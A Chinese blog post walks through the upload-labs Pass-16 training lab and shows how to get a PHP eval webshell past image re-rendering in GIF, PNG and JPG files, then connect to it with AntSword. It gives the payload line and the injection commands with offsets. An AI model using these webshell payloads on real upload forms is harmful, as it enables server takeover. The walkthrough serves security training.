PHP 图片二次渲染绕过

原创 于 2025-05-18 16:50:49 发布 · 263 阅读 · 7 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #网络安全 #web安全

以 upload-labs 的 Pass-16 为例,尝试 二次渲染绕过

更多内容查看个人博客:https://wanzi.online

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])){
    // 获得上传文件的基本信息,文件名,类型,大小,临时文件路径
    $filename = $_FILES['upload_file']['name'];
    $filetype = $_FILES['upload_file']['type'];
    $tmpname = $_FILES['upload_file']['tmp_name'];

    $target_path=UPLOAD_PATH.'/'.basename($filename);

    // 获得上传文件的扩展名
    $fileext= substr(strrchr($filename,"."),1);

    //判断文件后缀与类型,合法才进行上传操作
    if(($fileext == "jpg") && ($filetype=="image/jpeg")){
        if(move_uploaded_file($tmpname,$target_path)){
            //使用上传的图片生成新的图片
            $im = imagecreatefromjpeg($target_path);

            if($im == false){
                $msg = "该文件不是jpg格式的图片!";
                @unlink($target_path);
            }else{
                //给新图片指定文件名
                srand(time());
                $newfilename = strval(rand()).".jpg";
                //显示二次渲染后的图片(使用用户上传图片生成的新图片)
                $img_path = UPLOAD_PATH.'/'.$newfilename;
                imagejpeg($im,$img_path);
                @unlink($target_path);
                $is_upload = true;
            }
        } else {
            $msg = "上传出错!";
        }

    }else if(($fileext == "png") && ($filetype=="image/png")){
        if(move_uploaded_file($tmpname,$target_path)){
            //使用上传的图片生成新的图片
            $im = imagecreatefrompng($target_path);

            if($im == false){
                $msg = "该文件不是png格式的图片!";
                @unlink($target_path);
            }else{
                 //给新图片指定文件名
                srand(time());
                $newfilename = strval(rand()).".png";
                //显示二次渲染后的图片(使用用户上传图片生成的新图片)
                $img_path = UPLOAD_PATH.'/'.$newfilename;
                imagepng($im,$img_path);

                @unlink($target_path);
                $is_upload = true;               
            }
        } else {
            $msg = "上传出错!";
        }

    }else if(($fileext == "gif") && ($filetype=="image/gif")){
        if(move_uploaded_file($tmpname,$target_path)){
            //使用上传的图片生成新的图片
            $im = imagecreatefromgif($target_path);
            if($im == false){
                $msg = "该文件不是gif格式的图片!";
                @unlink($target_path);
            }else{
                //给新图片指定文件名
                srand(time());
                $newfilename = strval(rand()).".gif";
                //显示二次渲染后的图片(使用用户上传图片生成的新图片)
                $img_path = UPLOAD_PATH.'/'.$newfilename;
                imagegif($im,$img_path);

                @unlink($target_path);
                $is_upload = true;
            }
        } else {
            $msg = "上传出错!";
        }
    }else{
        $msg = "只允许上传后缀为.jpg|.png|.gif的图片文件!";
    }
}

1、gif 绕过

上传正确的图片 fish_real.gif,将上传后的照片另存为 fish2_real.gif,并使用 010 Editor 比较两张图片

PixPin_2025-05-13_16-31-41

在未被二次渲染的部分插入一句话木马,另存为 fish2_trojan.gif 后上传成功

PixPin_2025-05-13_16-32-08

使用蚁剑进行连接

PixPin_2025-05-13_16-33-04

2、png 绕过

使用 Python 写了一个用于 png 二次渲染绕过的脚本,项目地址:png_payload

python png_payload.py --input fish.png --payload "<?php @eval($_POST['fish']);?>" --offset 0

可以使用 010 Editor 看到 fish-payload.png 中注入的 payload

PixPin_2025-05-14_20-42-43

上传成功,但下载上传后的图片发现 payload 不完整

PixPin_2025-05-14_20-44-02

经过测试需要设置一个合适的 PLTE block 偏移量,当 offset0 时 payload 将被注入到 PLTE 头部,可能导致二次渲染后的 payload 不完整。

offset 设置为 30

python png_payload.py --input fish.png --payload "<?php @eval($_POST['fish']);?>" --offset 30

PixPin_2025-05-14_20-44-47

上传成功,下载上传后的图片发现 payload 完整

PixPin_2025-05-14_20-45-33

使用蚁剑进行连接

PixPin_2025-05-14_20-46-11

3、jpg 绕过

参考了一个用于 jpg 二次渲染绕过的 php 脚本并使用 Python 进行了打包,项目地址:jpg_payload

上传正确的图片 fish_real.jpg,将上传后的照片另存为 fish2_real.jpg,使用 jpg_payload 注入 payload

jpg_payload.exe fish2_real.jpg "<?php @eval($_POST['fish']);?>"

可以使用 010 Editor 看到 payload_fish2_real.jpg 中注入的 payload

PixPin_2025-05-14_22-33-00

上传成功,下载上传后的图片发现 payload 完整

PixPin_2025-05-14_22-33-46

使用蚁剑进行连接

PixPin_2025-05-14_22-40-40

jpg 图片二次渲染绕过不易成功,需要多换几张图片尝试。

Upload-Labs(16)
Braindance
02-28 460
前言 ​ 我在这道题上花了快一天的时间,但是也学到了不少姿势,觉得东西应该足够多,而且参考了的博客发现这道题算是有歧义的,不知道作者想要考察的点是哪一个,所以算是有两种解法吧,可惜的是两种方法都不算是大成功,只有部分成功执行了。 ​ 参考博客:upload-labs之pass 16详细分析 Pass-16 ​ 源码(三种图片的判定,只贴一个吧,篇幅小一点): $is_upload = false; $msg = null; if (isset($_POST['submit'])){ // 获得上传.
图片二次渲染绕过
m0_59049258的博客
09-10 1084
以upload-labs靶场第十七关为例。
【upload-labs】————17、Pass-16
Fly_鹏程万里
08-15 469
查看源代码 $is_upload = false; $msg = null; if (isset($_POST['submit'])){ // 获得上传文件的基本信息,文件名,类型,大小,临时文件路径 $filename = $_FILES['upload_file']['name']; $filetype = $_FILES['upload_file']['typ...
upload-labs:pass-16
羽的博客
07-11 221
在做这一题前,要先打开php.ini文件,将php_exif模块前面的;去掉。 然后重启Apache。 这样就可以正常上传了。 这是 php的内置函数,用于读取一个图像的第一个字节并检查其签名。 用图片马依然可以过 ...
upload-labs靶场Pass-16
wanggonghanfei的博客
10-27 1576
upload图片木马上传,
upload-labs之pass 16详细分析
q1415500189的博客
01-20 458
upload-labs之pass 16详细分析
ctfshow web165 JPG二次渲染脚本(生成图片马)脚本
10-21
ctfshow web165 JPG二次渲染脚本(生成图片马)脚本
WEB攻防-通用漏洞-文件上传-二次渲染-代码变异
最新发布
weixin_45534587的博客
01-03 1146
接上篇。
文件上传绕过2——.uaer.ini+二次渲染
xiaoheizi的博客
06-29 362
user.ini就是一个可以由用户”自定义“的php.ini,我们能够自定义的设置是模式为“PHP_INI_PERDIR 、 PHP_INI_USER”的设置。新建一个文件名为.user.ini的文件,并将内容写为:auto_prepend_file=1.jpg,将.user.ini上传至服务器。gif可以直接在图片插入图片马,jpg png不建议直接在图片插入脚本代码,可以在网上找图片马生成脚本运行。想要.user.ini文件生效需要一个索引,就是说需要在上传文件的存储路径下有个.php可执行文件。
Upload-Lab第17关:二次渲染技巧轻松绕过上传限制!
didiplus
08-24 818
文件上传漏洞一直是网络安全中一个重要且复杂的领域。在Upload-Lab的第17关,我们将探讨如何利用二次渲染技术绕过文件上传验证限制。二次渲染是指服务器在文件上传后,再次处理或修改文件内容的过程。攻击者可以利用这一过程,上传一个看似安全的文件,但通过服务器的二次处理,将其转换为恶意文件。例如,上传一个合法的图片文件,但在服务器处理过程中,将其内容转变为恶意脚本。
网络安全】upload-labs Pass-17 解题详析
等风来
08-18 6436
由于二次渲染图片中的部分数据会被修改,即(A,B,C)可能会被修改为(A,D,E),那么对于此限制,我们可以找到不被修改的。imagecreatefrompng是PHP中的一个函数,用于创建一个新的图像资源对象,并从PNG格式的图像文件中读取数据。,因为它不被过滤,因此我们将A修改为注入语句,此时语句不会被过滤,从而达到命令执行的目的。可以看到自00000190后,数据被二次渲染,也就是说在该行之前的数据是不会被渲染的。
upload-labs pass-16
weixin_54347738的博客
09-05 245
建议将文件都写在D盘下,否则后面会因为权限问题无法再16进制编辑器中修改文件字段。
upload -labs pass17
qq_45106794的博客
11-07 659
#upload -labs pass17 ####################### unlink() 函数删除文件。 若成功,则返回 true,失败则返回 false。 语法 unlink(filename,context) ####################### $is_upload = false; $msg = null; if(isset($_POST['submit']...
Upload-Labs第Pass-16通关(二次渲染绕过) 详解
小飒的博客
09-01 1388
看到一篇不错的文章分享下 原文:https://www.fujieace.com/penetration-test/upload-labs-pass-16.html Upload-Labs第Pass-16通关(二次渲染绕过) 详解 由于Pass-16通关有点复杂,我就特意单独把这关拿出来详解一下! 不过我在看了Pass-16的源码后,发现了一些有意思的东西。 else if((KaTeX parse error: Expected 'EOF', got '&' at position 19: …ee
upload pass-16
qq_45106794的博客
11-07 222
#upload-labs pass-16 在这里必须好好诉诉苦,弄了好久/(ㄒoㄒ)/~~ 首先上网弄一张.gif的图片,往里面弄一句话木马 直接上传,然而发现C刀连接不了,查看源代码。发现有二次渲染在搞鬼,猜测它将我在1.gif最后的一句话给渲染没了,所以我只能将靶机上的图片跟我上传的图片进行对比,看看哪些是渲染前后都没有改变的,然后往1.gif没有改变的区域再加入一句话木马,然后直接上传,最后...
文件上传--Upload-labs--Pass17--条件竞争
2302_79800344的博客
02-20 1200
条件竞争原理
Upload-Labs(17-20)
Braindance
02-28 320
Pass-17 ​ (windows环境,php版本5.2.17,题号是18题) 源码: $is_upload = false; $msg = null; if(isset($_POST['submit'])){ $ext_arr = array('jpg','png','gif'); $file_name = $_FILES['upload_file']['name']; $temp_file = $_FILES['upload_file']['tmp_name']; .
文件上传绕过upload-labs-master通关16-20
per_se_veran_ce的博客
09-12 1037
第十六关 这一关对后缀名和文件类型啥的都进行了很严格的控制,而且在后面还对图片进行了二次编译。 原理:将一个正常显示的图片,上传到服务器。寻找图片渲染后与原始图片部分对比仍然相同的数据块部分,将Webshell代码插在该部分,然后上传。具体实现需要自己编写Python程序,人工尝试基本是不可能构造出能绕过渲染函数的图片webshell的。 那么,怎么找到相同的部分呢?需要一个HxD的软件,下...
PHP PNG二次渲染脚本隐藏木马解析
攻击者可能通过这种方式绕过安全检查,将恶意代码嵌入到看似无害的文件中。 为了防止这种攻击,网站开发者应确保对所有用户输入进行严格的过滤和验证,避免直接执行未经检查的用户数据。同时,定期更新和加固服务器...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值